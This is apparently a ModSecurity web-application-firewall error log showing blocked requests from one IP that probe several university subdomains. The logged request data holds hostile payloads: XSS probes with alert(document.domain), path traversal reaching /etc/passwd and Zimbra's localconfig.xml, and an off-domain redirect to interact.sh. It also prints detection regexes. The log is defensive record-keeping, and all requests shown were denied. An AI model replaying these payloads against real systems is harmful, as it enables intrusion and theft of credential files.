[unique_id "ZO15h8Co-f0AAAoLfE8AAAAG"]
[Tue Aug 29 11:52:23.617537 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoEZOIAAAAB"]
[Tue Aug 29 11:52:23.630948 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoGFXcAAAAE"]
[Tue Aug 29 11:52:24.683810 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15iMCo-f0AAAoO5ycAAAAK"]
[Tue Aug 29 11:52:24.725459 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnjjN8AAAAX"]
[Tue Aug 29 11:52:24.790024 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAlIBmAAAAAn"]
[Tue Aug 29 11:52:24.795371 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAoEZOMAAAAB"]
[Tue Aug 29 11:52:24.824860 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnjjOAAAAAX"]
[Tue Aug 29 11:52:24.833516 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAoN9b8AAAAJ"]
[Tue Aug 29 11:52:24.833695 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAoLfFEAAAAG"]
[Tue Aug 29 11:52:24.841251 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15iMCo-f0AAAoO5ygAAAAK"]
[Tue Aug 29 11:52:24.842225 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnTlO8AAAAA"]
[Tue Aug 29 11:52:24.860237 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAnHQjkAAAAT"]
[Tue Aug 29 11:52:25.559305 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAoEZOUAAAAB"]
[Tue Aug 29 11:52:25.567684 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAfWONYAAAAL"]
[Tue Aug 29 11:52:25.579149 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAnTlPAAAAAA"]
[Tue Aug 29 11:52:25.591603 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAoQ3H0AAAAN"]
[Tue Aug 29 11:52:25.596014 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15icCo-f0AAAnHQjoAAAAT"]
[Tue Aug 29 11:52:25.596795 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAlIBmIAAAAn"]
[Tue Aug 29 11:52:25.771649 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAn96BAAAAAD"]
[Tue Aug 29 11:52:26.548136 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoPuTcAAAAM"]
[Tue Aug 29 11:52:26.549439 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAnoOrEAAAAf"]
[Tue Aug 29 11:52:26.552005 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoEZOcAAAAB"]
[Tue Aug 29 11:52:26.556064 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAnn2C8AAAAe"]
[Tue Aug 29 11:52:26.567945 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoQ3H8AAAAN"]
[Tue Aug 29 11:52:26.594750 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAoN9cQAAAAJ"]
[Tue Aug 29 11:52:26.601551 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAnTlPQAAAAA"]
[Tue Aug 29 11:52:26.605065 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAoMLasAAAAH"]
